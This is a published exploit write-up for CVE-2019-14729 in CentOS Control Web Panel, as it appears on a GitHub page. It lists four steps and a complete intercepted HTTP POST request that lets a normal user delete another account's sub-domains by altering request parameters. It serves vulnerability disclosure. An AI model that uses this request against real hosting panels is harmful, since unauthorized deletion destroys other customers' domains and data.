Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Exploit Title       : CWP (CentOS Control Web Panel) Delete other sub-domain
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.851
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14729
Reference	    : N/A
  1. Log in as a normal user.
  2. Go to "Domains >> Sub Domains"
  3. Try to delete any sub-domain from the account
  4. Intercept the request, and modify parameter "domain" and "subdomain"
POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>